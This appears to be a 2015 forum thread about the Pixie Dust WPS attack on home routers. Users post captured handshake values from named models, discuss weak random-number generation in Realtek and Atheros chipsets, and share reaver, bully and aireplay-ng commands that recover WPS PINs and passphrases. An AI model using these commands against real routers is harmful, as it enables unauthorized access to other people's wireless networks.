[P] PKR: 3f:2b:3b:b8:ba:89:4f:85:02:31:77:2c:71:3c:75:05:74 :ca:69:da:99:f7:b8:c3:72:9c:2b:c3:9b:00:d0:f2:d3:5 6:7a:da:ab:65:da:99:22:cb:00:77:33:80:d0:6e:59:17: 3f:3f:38:b5:8c:66:48:c9:60:03:da:5d:28:ef:7e:60:5c :7d:bd:bb:dd:7b:f4:d2:44:f0:62:74:b0:d1:3e:c2:c8:f 7:7b:e8:d7:76:f5:53:84:97:9b:1b:85:83:28:fc:4b:45: ca:93:a5:5a:cd:03:0d:f4:bb:bf:c0:93:15:92:5a:43:e6 :0d:ef:2c:d2:5f:5b:da:b0:ab:62:dd:76:74:03:cd:e7:a e:c8:b4:e9:ff:61:53:90:e3:70:c0:58:c7:25:99:0d:02: 5c:03:96:07:5f:35:e9:ba:4a:db:67:3e:07:76:50:6f:b0 :d5:0e:e1:56:e8:86:32:fd:52:68:7c:6f:83:56:ec:e5:a 0:8c:80:80:25:74:ae:a6:40
[P] AuthKey: b0:82:36:0d:19:6a:7a:00:0c:16:73:1d:fc:0b:16:62:7f :ea:f1:0f:af:31:38:90:b0:14:59:5a:08:93:a8:13
[P] E-Hash1: d4:b3:36:3f:0e:c9:57:4f:1f:c5:44:4a:93:e2:e3:33:1f :6e:1e:1f:76:4f:6f:f6:26:4e:21:2a:86:68:ab:0b
[P] E-Hash2: 6c:ac:17:51:5f:89:5d:00:dc:43:93:45:fc:ab:61:ff:a7 :e5:f4:f0:52:97:a3:3b:4a:8d:0d:86:65:ee:aa:4d

soxrok2212
2015-06-03, 15:55
Invulnerable


[P] E-Nonce: aa:90:80:28:ea:8e:89:cc:03:4a:ad:df:8e:87:02:26
[P] PKE: d9:c5:a6:9e:3a:c2:34:e8:15:85:5e:b6:c4:56:76:54:cd :3f:52:0e:f4:c2:14:5a:7c:08:9d:57:f6:f6:16:dd:e3:b f:30:ed:8a:45:77:73:14:84:10:a6:43:04:9f:0c:ad:d3: 6d:6b:6d:2e:fb:a1:10:a9:14:16:c8:88:68:73:2f:96:ec :83:12:19:f4:7d:ab:79:3a:f9:1d:c8:ad:03:e0:c9:08:3 3:78:98:fb:b0:5b:81:1f:0f:e3:1e:2e:7e:40:01:b4:e6: fd:73:2b:16:12:3d:f1:b8:8a:f6:d5:f1:19:1e:67:78:b0 :4e:6f:b5:f0:d8:14:b2:90:70:b3:a9:4f:49:dc:c0:ef:9 c:07:0d:c7:7d:9b:59:24:4b:02:67:67:50:42:66:8e:4c: 4e:b0:7d:92:4f:42:9b:da:cb:d6:08:53:5b:fa:74:49:54 :14:6d:58:6e:71:b3:8c:9e:55:c9:21:5a:7a:9d:23:07:e b:8e:c1:39:0a:d8:2f:c9:72
[P] WPS Manufacturer: ASUSTeK Computer Inc.
[P] WPS Model Name: Wi-Fi Protected Setup Router
[P] WPS Model Number: RT-AC56U
[P] Access Point Serial Number: d8:50:e6:da:0f:08
[P] R-Nonce: 0a:e6:39:ba:f9:44:27:bb:cb:94:8a:47:4c:8e:7b:78
[P] PKR: d8:fd:8c:86:72:8b:a8:ce:4d:e9:3d:a4:f9:9f:4c:3d:7b :62:c1:77:b2:63:52:99:c9:8b:7b:03:fb:0f:84:62:49:a f:35:72:db:da:7b:a1:d8:31:3e:bb:88:a8:64:a6:83:58: 80:66:fe:12:00:79:c7:42:a6:44:82:be:72:77:3e:ec:db :53:54:77:3b:be:67:3c:53:f6:c6:d9:96:e3:0a:69:99:a f:3e:28:c9:a0:fb:16:12:f5:c7:4d:94:b2:99:bf:53:3b: 49:53:9b:23:1e:ca:0a:8b:b1:14:50:34:ef:cc:1c:6a:d5 :cb:7b:52:b5:4e:5d:b6:97:f2:de:9e:2f:ba:2e:69:30:6 f:02:a2:dd:7c:29:6e:b5:f5:0b:d6:8e:41:18:2e:38:85: 82:38:d7:f4:3a:67:c3:27:a1:d6:e9:e4:17:be:c7:12:71 :59:66:31:63:4d:cb:b8:0c:8a:80:04:40:56:80:69:df:9 0:ab:37:3a:8b:cc:43:5b:3e
[P] AuthKey: 27:e7:e4:5f:b8:60:6a:50:e5:78:a6:13:44:c4:81:40:58 :7c:70:29:b0:66:0f:26:ac:83:91:9d:bd:a2:f9:8a
[P] E-Hash1: bb:dc:4e:7e:ae:28:9a:07:84:c3:df:fd:92:96:41:62:89 :f0:47:cd:6e:3e:c0:a9:21:ad:f7:ed:0a:3c:09:92
[P] E-Hash2: 70:76:13:b9:e9:84:a2:49:dc:93:70:df:19:30:9b:b8:4e :c5:68:16:8f:5f:b5:1c:6a:87:b0:e0:a7:b6:c7:ad

Invulnerable


[P] E-Nonce: 5b:e0:19:5c:4c:76:2e:08:3f:1b:b5:f1:13:ae:29:36
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer:
[P] WPS Model Name: Wireless N Router
[P] WPS Model Number: DIR-501
[P] Access Point Serial Number: 20070413-0001
[P] R-Nonce: 03:e9:eb:c1:80:d9:63:10:d8:16:77:cf:fa:41:d4:5b
[P] PKR: 3f:2b:3b:b8:ba:89:4f:85:02:31:77:2c:71:3c:75:05:74 :ca:69:da:99:f7:b8:c3:72:9c:2b:c3:9b:00:d0:f2:d3:5 6:7a:da:ab:65:da:99:22:cb:00:77:33:80:d0:6e:59:17: 3f:3f:38:b5:8c:66:48:c9:60:03:da:5d:28:ef:7e:60:5c :7d:bd:bb:dd:7b:f4:d2:44:f0:62:74:b0:d1:3e:c2:c8:f 7:7b:e8:d7:76:f5:53:84:97:9b:1b:85:83:28:fc:4b:45: ca:93:a5:5a:cd:03:0d:f4:bb:bf:c0:93:15:92:5a:43:e6 :0d:ef:2c:d2:5f:5b:da:b0:ab:62:dd:76:74:03:cd:e7:a e:c8:b4:e9:ff:61:53:90:e3:70:c0:58:c7:25:99:0d:02: 5c:03:96:07:5f:35:e9:ba:4a:db:67:3e:07:76:50:6f:b0 :d5:0e:e1:56:e8:86:32:fd:52:68:7c:6f:83:56:ec:e5:a 0:8c:80:80:25:74:ae:a6:40
[P] AuthKey: b0:82:36:0d:19:6a:7a:00:0c:16:73:1d:fc:0b:16:62:7f :ea:f1:0f:af:31:38:90:b0:14:59:5a:08:93:a8:13
[P] E-Hash1: d4:b3:36:3f:0e:c9:57:4f:1f:c5:44:4a:93:e2:e3:33:1f :6e:1e:1f:76:4f:6f:f6:26:4e:21:2a:86:68:ab:0b
[P] E-Hash2: 6c:ac:17:51:5f:89:5d:00:dc:43:93:45:fc:ab:61:ff:a7 :e5:f4:f0:52:97:a3:3b:4a:8d:0d:86:65:ee:aa:4d

Hey buddy, the DIR-501 should've worked, I've had someone else report that it worked. Did you try a full brute force with pixiewps?

soxrok2212
2015-06-03, 16:50
Hey community, someone has recently brought to my and Wiire's attention an Atheros device that produces a strange E-Nonce, it follows this pattern:


xx:xx:00:00:00:00:00:00:00:00:00:00:00:00:00:00

where x is a hex character obviously (0-9, a-f).

It has occurred many times over different exchanges. It has happened in AR9130/AR9102 devices.

If E-S1 and E-S2 follow the same pattern, it would be a relatively fast crack for those chips, faster than the full Realtek bruteforce. It is not yet know if this is the case, but if anyone would like to contribute some data it couldn't hurt!

On the other hand, another Realtek chip was discovered to not use the time since Epoch PRNG, but it still follows the static PKE AND the E-Nonce follows a pattern like this:


xx:xx:00:00:xx:xx:00:00:xx:xx:00:00:xx:xx:00:00


It is a SoC, the RTL8671. Being a SoC, it might use a different PRNG but it may be just as vulnerable, if not even more vulnerable. There are a few people including me that are actively looking into it. I hope we find something soon!

stanke
2015-06-04, 15:56
Hey buddy, the DIR-501 should've worked, I've had someone else report that it worked. Did you try a full brute force with pixiewps?

Hello

For me dir501 also not working.
[P] E-Nonce: 51:a5:44:af:03:06:4e:0f:3e:c0:0b:b9:09:1b:c3:2c
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer:
[P] WPS Model Name: Wireless N Router
[P] WPS Model Number: DIR-501
[P] Access Point Serial Number: 20070413-0001
[+] Received M1 message
[P] R-Nonce: 4f:2b:f6:b7:08:bc:59:51:d7:b0:11:cb:0f:dd:8c:db
[P] PKR: 86:de:bf:e6:4a:ff:74:40:45:0f:91:5d:ff:a6:34:69:9e :1c:97:93:2e:48:c5:14:94:66:bd:f9:8b:59:44:4d:cc:9 7:bb:8e:41:f2:9f:47:f2:e1:f0:ad:2b:01:f7:1b:cb:04: 60:bd:d5:42:87:4d:75:dd:58:6c:6a:74:b5:c8:65:1d:09 :32:20:0b:e2:39:e9:49:1c:29:8a:d1:9f:18:bc:4b:7e:4 d:bd:db:e4:b9:9d:65:59:dd:51:c3:9d:9b:3e:5f:26:a1: 76:85:bd:4e:fc:de:ac:78:0d:57:f5:72:22:f7:16:9f:b8 :a7:f4:2c:4b:37:c8:3f:5f:9c:58:45:61:de:7b:17:ae:0 a:c8:e1:c3:30:a0:3c:7a:0d:e2:d8:9f:fe:04:a7:c3:7a: 42:c4:22:6a:32:02:2d:e5:ea:12:47:7c:06:1f:f4:62:11 :94:e4:09:3f:a3:8a:76:44:88:ed:fb:a4:ff:8b:0f:2a:0 c:b6:06:e0:0b:ca:05:ff:07
[P] AuthKey: 41:64:d3:91:09:11:8b:d1:f7:ec:21:6f:29:69:48:ba:0e :1e:9b:3e:26:c5:60:41:27:a9:69:da:12:7f:59:6e
[+] Sending M2 message
[P] E-Hash1: f6:63:0a:dd:2a:0c:e6:e3:e0:0d:76:98:35:6a:c9:14:89 :a8:3d:67:3b:5d:d2:08:ac:62:24:15:f7:e8:3d:8d
[P] E-Hash2: 76:29:da:24:1a:d8:d4:1b:b9:b4:c9:5f:3b:1c:19:28:81 :96:7a:40:f9:ac:d0:95:43:96:96:85:3c:18:49:d0
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 2 s
[Pixie-Dust]
[Pixie-Dust] [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.


tried also with pixiewps force. If you need some more testing please feel free to contact me.

someone_else
2015-06-05, 09:55
Here's a D-Link 501 (Version B) which works with --force :


[P] E-Nonce: 50:37:4c:db:7a:3c:16:90:4b:57:6a:43:61:c2:85:01
[P] R-Nonce: ae:9b:f2:26:29:23:38:17:0f:d3:7f:bd:92:fb:2d:3b
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] PKR: b5:4a:f2:45:95:44:27:92:f4:8b:65:05:6f:88:83:ff:d3 :20:fe:d9:ed:d8:e1:f0:52:3d:a9:95:2a:97:33:53:f4:7 2:66:30:83:90:8c:3c:58:81:ce:9f:7d:31:1b:04:a2:d2: ca:a6:7b:06:ca:15:97:f4:a5:e9:f5:ef:2e:2b:b7:fc:33 :1c:f7:44:01:80:20:a2:49:f4:54:5e:9d:11:49:e3:39:1 6:0e:45:e9:08:4d:7a:75:47:a0:a6:d1:4d:9e:ee:4a:d0: 69:e4:23:ef:5d:9f:d1:4b:34:19:ed:b4:77:95:81:3d:8a :6c:64:a3:f8:5d:d4:b1:89:00:da:65:9b:11:2b:20:5d:3 6:49:79:a9:25:b2:b6:26:0e:51:45:eb:4c:4a:f3:f1:b3: ac:e9:67:0a:fe:9a:b6:c8:60:75:a6:1f:2a:9b:51:1f:e2 :34:b0:78:64:f5:55:25:93:8b:37:d5:cf:74:fd:25:bd:4 3:cb:e4:e0:c7:a7:71:cf:8c
[P] AuthKey: 8e:7d:72:ef:1d:c3:ee:c5:4a:68:56:10:d5:60:d0:0b:62 :9c:d9:b1:2d:a0:a7:5c:da:81:38:fe:a4:b9:6b:4a
[P] E-Hash1: 90:b1:29:cf:44:fd:09:3a:74:7e:e1:fb:17:51:52:85:1a :41:26:30:bb:23:44:5d:53:b5:46:c4:5c:fa:1c:19
[P] E-Hash2: 43:d8:2a:15:c0:85:82:dc:32:1b:bf:04:47:15:73:56:fa :4a:f1:1c:13:6b:db:7a:0d:2e:fd:aa:37:96:44:7b

beddj
2015-06-06, 11:05
I have a Netgear R3600v2, router. Broadcom chipset BCM4360. Doesnt seem to be working. I can send .cap if you want/need. Doing brute force now

beddj
2015-06-06, 11:17
Netgear R3600v2 Broadcom BCM4360, doesnt seem to be working

E-Nonce: 5b:44:ac:16:26:6f:78:42:7a:9b:b7:91:60:c5:62:87
[P] PKE: 01:fb:e7:b0:80:43:cc:24:6d:f6:9d:b8:9a:89:0e:d0:bb :0e:57:10:c9:d3:bc:c1:e8:a0:df:e6:61:3e:e9:4a:9f:7 0:cb:ac:0b:71:7a:0e:bd:10:2d:83:c2:a8:b4:c4:3c:53: 04:7e:a7:17:13:43:81:9a:6b:f6:b7:d6:0e:32:bb:bf:33 :ce:2e:ca:b6:1f:c3:48:39:77:69:63:80:99:11:78:0d:f 7:0c:39:3d:4c:87:fa:c7:22:9d:97:41:11:f7:c9:b5:20: 09:01:0b:4b:12:2c:88:cb:99:53:11:69:2f:48:3a:2d:f9 :8b:d6:20:7c:84:a5:b0:ad:71:12:4d:46:29:74:66:58:7 c:f7:fe:52:92:6c:e7:86:41:b5:20:e4:e6:b9:64:95:c6: 08:f5:c4:e1:5c:7e:bf:51:a3:e2:da:17:d9:d7:b5:38:be :a5:4f:30:e8:bb:10:51:f6:78:27:0d:51:1d:49:c3:38:2 a:3a:a8:2b:05:6c:72:80:49
[P] WPS Manufacturer: NETGEAR, Inc.
[P] WPS Model Name: R6300v2
[P] WPS Model Number: R6300v2
[P] Access Point Serial Number: 679
[+] Received M1 message
[P] R-Nonce: 2c:2a:4b:27:57:1d:b5:5f:6a:90:f0:9d:26:b7:10:28
[P] PKR: 43:4b:29:6c:ff:cb:c9:6f:5c:f6:6e:2c:35:25:8b:e8:a4 :1b:bc:b2:df:a8:10:8b:72:c6:b8:a2:0b:97:76:e4:47:6 6:6a:11:7a:b0:fd:75:3f:cd:17:8f:16:c6:7e:44:cd:aa: f8:fb:0f:91:80:e6:2c:31:91:a9:a5:84:4a:4a:de:31:c1 :65:1e:a6:57:28:41:91:3d:11:dc:81:2c:af:b9:2f:8b:e e:41:1c:3b:05:61:03:0b:07:b0:10:b6:90:25:09:fd:e9: 4e:ec:bb:f5:49:8f:5c:e1:7f:43:b8:e8:70:2c:cc:db:bd :6d:a4:12:3b:b6:1a:f5:dc:43:11:68:11:9e:eb:d2:67:b 5:ea:58:7f:f9:6a:63:f2:a6:f6:21:ed:06:9f:2e:42:41: e9:18:d6:a2:7d:b5:3e:1b:04:12:eb:de:c6:05:5b:40:a5 :02:b1:1a:54:6d:a6:b2:3f:71:5e:8a:b3:77:f4:b4:66:f 7:f5:75:3c:a2:31:8e:dd:b3
[P] AuthKey: 52:fd:cb:ad:ec:b8:a5:a5:5b:79:38:ca:c6:c5:8c:ef:5f :8b:be:6a:61:4c:b5:e0:19:a1:39:bf:84:fd:a4:18
[+] Sending M2 message
[P] E-Hash1: f3:27:0d:b1:97:6d:ba:83:18:25:44:d8:0f:34:64:09:da :ce:7c:19:b9:89:87:62:98:41:17:45:3d:e4:db:63
[P] E-Hash2: d7:5b:14:f3:a1:43:d2:0b:3c:59:07:ae:ee:c4:dc:2a:32 :a2:a4:fa:18:e5:b5:20:52:c5:85:dc:27:a6:84:6b

soxrok2212
2015-06-07, 03:04
Most Broadcom chipsets are not vulnerable because they run linux which uses a cryptographically secure method of generating random keys with good sources of entropy... it's pretty much completely unpredictable as of right now. In the future, something could certainly be found but not right now. The only Broadcom devices that will work are devices the run eCos which are typically found in DSL/Wireless gateway modems or Cable modem/Gateways.

soxrok2212
2015-06-07, 04:31
Okay so 3 new things have been brought to my attention, some of which I've already pointed out but I just want to clear things up.
1- Someone recently e-mailed me about an Atheros device, specifically a D-Link DIR-600 rev A1. (https://wikidevi.com/wiki/D-Link_DIR-600_rev_A1) This device has an AR9285. A few months ago, the static PKE in Realtek devices made me question their implementation. Many of you know that PKE:


d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b


Well, it turns out that this device also has a static PKE!


91:72:d8:6a:3d:bc:4c:5b:89:c8:b9:86:ff:31:ee:96:b9 :bc:ab:ac:cc:1d:42:77:1d:46:09:a3:91:e3:b9:b2:c2:8 0:a3:2e:b4:01:58:36:f9:90:02:be:ab:94:69:31:38:4e: 84:d2:7a:06:7e:bb:f6:15:9b:08:a6:55:67:48:29:c1:b0 :69:fb:79:51:a8:d0:d5:bf:8d:65:58:71:4e:be:0d:33:6 8:30:87:04:7e:71:99:d1:26:e7:fa:8a:55:2a:b6:be:c5: 23:f6:87:c8:f8:bd:6c:77:0c:09:3f:40:83:64:90:35:47 :0f:b8:1b:6d:31:d5:3e:2f:35:7a:27:16:57:d8:1e:0c:8 b:41:f5:1c:3b:b0:31:f5:b0:d7:23:40:26:7b:ce:b5:fd: 07:c6:58:64:06:1a:45:55:4b:c4:ca:3b:50:57:bd:a0:fc :7c:69:7f:06:79:52:4e:30:1a:6d:f8:16:6e:1b:9f:51:9 7:e8:40:2f:9b:97:d1:7e:7e


I wasn't able to find source code for this specific model and unfortunately I can't find a firmware link either. Here is a list with all devices that use the AR9285 chip[/url] so the community can look to see if their devices follow the same pattern.

2- Another strange thing is happening with Atheros, specifically in the Linksys WRT160NL. (https://wikidevi.com/wiki/Linksys_WRT160NL) This is one of Linksys's devices that is completely open source, meaning it runs Linux. This WRT160NL has a AR9130/AR9102 chipset. The strange thing here is that the Enrollee Nonce follows a strange pattern:



XX:XX:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00


Usually, E-S1 and E-S2 are generated right after the Enrollee Nonce, so I'd bet there is some sort of issue here. Here is a download link (http://downloads.linksys.com/downloads/gplcode/1224701345638/WRT160NL_1.0.04.002.tar.gz) for the open source firmware and a list of AR9130/AR9102 devices (https://wikidevi.com/wiki/Special:Ask?title=Special%3AAsk&q=%3Cq%3E%3Cq%3E%5B%5BWI1+chip1+model::~AR9130*%5D %5D+%5B%5BWI1+802dot11+protocols::bgn%5D%5D%3C%2Fq %3E+OR+%3Cq%3E%5B%5BWI2+chip1+model::~AR9130*%5D%5 D+%5B%5BWI2+802dot11+protocols::bgn%5D%5D%3C%2Fq%3 E%3C%2Fq%3E&po=%3FEmbedded+system+type=Type%0D%0A%3FFCC+ID%0D% 0A%3FManuf%0D%0A%3FManuf+product+model=Manuf.+mdl% 0D%0A%3FCPU1+model=CPU1%0D%0A%3FCPU1+clock+speed%0 D%0A%3FFLA1+amount=FLA1%0D%0A%3FRAM1+amount=RAM1%0 D%0A%3FWI1+chip1+model=WI1+chip1%0D%0A%3FWI1+chip2 +model=WI1+chip2%0D%0A%3FWI1+MIMO+config=WI1+MIMO% 0D%0A%3FSupported+802dot11+protocols=PHY+modes%0D% 0A%3FOUI%0D%0A%3FOUI+(ethernet)=OUI+(Eth)%0D%0A%3F Estimated+year+of+release=Est.+year&eq=yes&p%5Bformat%5D=broadtable&order%5B0%5D=ASC&sort_num=&order_num=ASC&p%5Blimit%5D=500&p%5Boffset%5D=&p%5Blink%5D=all&p%5Bsort%5D=&p%5Bheaders%5D=show&p%5Bmainlabel%5D=&p%5Bintro%5D=&p%5Boutro%5D=&p%5Bsearchlabel%5D=…+further+results&p%5Bdefault%5D=&p%5Bclass%5D=sortable+wikitable+smwtable) for comparison against other devices.

3- Finally, another user pointed out a different Realtek chipset, the RTL8671 (as well as other SoC DSL/Wireless modems. I assume that since this chip is SoC, it may use a different PRNG. The nonces follow another strange pattern that as of right now we haven't been able to determine. Here is the pattern:



00:00:XX:XX:00:00:XX:XX:00:00:XX:XX:00:00:XX:XX


There is a device that has been confirmed to follow this pattern, a DIGISOL DG-BG4100NU. The firmware can be downloaded and extracted with binwalk here (https://dl.dropboxusercontent.com/u/343477341/digisol/wireless_solutions/adsl_routers/dg-bg4100nu/firmware/DG-BG4100NU_A1_Firmware_11OCT2014.zip), and the source code for the RTL8186 chip can be found here. (http://sourceforge.net/projects/rtl8186/)

--I already know that Wiire, Datahead and I are looking into these but they are both very busy and I don't know enough C to read code and understand it completely. T6_x is also looking into some interesting stuff as well. I'm coming back to the community looking for help! Maybe we can do this one without Bongard! That is my goal this time, and it probably doesn't help to make this public but thats alright! Leave a reply if you have any questions or comments and thanks in advance!

DetmL
2015-06-09, 05:03
Okay so 3 new things have been brought to my attention, some of which I've already pointed out but I just want to clear things up.
1- Someone recently e-mailed me about an Atheros device, specifically a D-Link DIR-600 rev A1. (https://wikidevi.com/wiki/D-Link_DIR-600_rev_A1) This device has an AR9285. A few months ago, the static PKE in Realtek devices made me question their implementation. Many of you know that PKE:


d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b


Well, it turns out that this device also has a static PKE!


91:72:d8:6a:3d:bc:4c:5b:89:c8:b9:86:ff:31:ee:96:b9 :bc:ab:ac:cc:1d:42:77:1d:46:09:a3:91:e3:b9:b2:c2:8 0:a3:2e:b4:01:58:36:f9:90:02:be:ab:94:69:31:38:4e: 84:d2:7a:06:7e:bb:f6:15:9b:08:a6:55:67:48:29:c1:b0 :69:fb:79:51:a8:d0:d5:bf:8d:65:58:71:4e:be:0d:33:6 8:30:87:04:7e:71:99:d1:26:e7:fa:8a:55:2a:b6:be:c5: 23:f6:87:c8:f8:bd:6c:77:0c:09:3f:40:83:64:90:35:47 :0f:b8:1b:6d:31:d5:3e:2f:35:7a:27:16:57:d8:1e:0c:8 b:41:f5:1c:3b:b0:31:f5:b0:d7:23:40:26:7b:ce:b5:fd: 07:c6:58:64:06:1a:45:55:4b:c4:ca:3b:50:57:bd:a0:fc :7c:69:7f:06:79:52:4e:30:1a:6d:f8:16:6e:1b:9f:51:9 7:e8:40:2f:9b:97:d1:7e:7e


I wasn't able to find source code for this specific model and unfortunately I can't find a firmware link either.
Perhaps this will help. ftp://ftp2.dlink.com/PRODUCTS/DIR-600/REVA/DIR-600_FIRMWARE_1.0.1.ZIP Or you can try Craig's D-Link wps pin generator?

soxrok2212
2015-06-09, 14:54
Perhaps this will help. ftp://ftp2.dlink.com/PRODUCTS/DIR-600/REVA/DIR-600_FIRMWARE_1.0.1.ZIP Or you can try Craig's D-Link wps pin generator?

Yeah I know about the PIN generator, but a chip based ATTACK would be more widespread and for other manufacturers as well.

soxrok2212
2015-06-09, 17:58
Perhaps this will help. ftp://ftp2.dlink.com/PRODUCTS/DIR-600/REVA/DIR-600_FIRMWARE_1.0.1.ZIP Or you can try Craig's D-Link wps pin generator?

You had a device with a strange E-Nonce that followed the XX:XX:00:00:XX:XX:00:00... pattern right? If so, can you grab like 5-10 sets of data? (Use PixieLoop mode in Reaver so you don't get locked out)

DetmL
2015-06-10, 03:49
You had a device with a strange E-Nonce that followed the XX:XX:00:00:XX:XX:00:00... pattern right? If so, can you grab like 5-10 sets of data? (Use PixieLoop mode in Reaver so you don't get locked out)

http://www.mediafire.com/download/l8b3gb98k474c3l/Pixie

soxrok2212
2015-06-10, 04:17
http://www.mediafire.com/download/l8b3gb98k474c3l/Pixie

Awesome thanks!

bahha
2015-06-14, 12:24
On some Technicolor the modified reaver recovers the pin but not the passphrase it freezes on


[+] Running reaver with the correct pin, wait ...
[+] Cmd : reaver -i wlan1mon -b 18:17:25:xx:xx:xx -c 11 -s y -vv -p xxxxxxxx
[Reaver Test] [+] BSSID: 18:17:25:xx:xx:xx
[Reaver Test] [+] Channel: 11


if such thing happens use bully to recover it
example :

bully -b 18:17:25:XX:xx:xx:xx: -c 11 -B -v 2 -p xxxxxxxx

it worked for me

kcdtv
2015-06-14, 12:52
Try to add -n to your reaver line
(by the way, that is not a pixie dust issue and it should be posted somewhere else ;) )

blitzatc
2015-06-14, 17:38
What also works is running aireplay-ng to force an association with the AP while you run reaver.
example:

aireplay-ng -1 12 -a <BSSID OF AP> -h <MAC ADDR. OF WIFI CARD> mon0

bora
2015-06-27, 21:29
I have a TP Link router which I cannot brake. Brute forcing also doesn't work. And I have to say that this is the only router that outputs e-s1 and e-s2.
I can see in my area about 100 devices and only this TP Link outputs e-s1 and e-s2. My other router is Arcadyan with RT2860 chipset and I can read Authkey, PKE, etc... but e-s1 and e-s2 are never displayed by reaver.
Is there a way to force displaying e-s1 and e-s2 ?
Pixiewps description says that Ralink chipset never generates e-s1 and e-s2 and they are always zero. How do I run pixiewps in this case?

here is a gist with reaver output of TP LINK WR841N
https://gist.github.com/anonymous/6184dc4f7f9fe19ef46d

wn722
2015-07-01, 16:03
oh could there be progress with Atheros stuff???

soxrok2212
2015-07-21, 20:39
oh could there be progress with Atheros stuff???
Maybe with the Tick Tock attack, but then again there are a lot of prerequisites for the attack to work, and it will really just optimize the regular 2011 online brute force. But you never know!

Gurgg
2015-07-26, 15:50
I think this may not be the correct space to ask for help with my issue; going to make a new thread sorry! please delete

soxrok2212
2015-07-26, 16:21
Anyone familiar with IDA Pro or binwalk or examining firmwares in general?

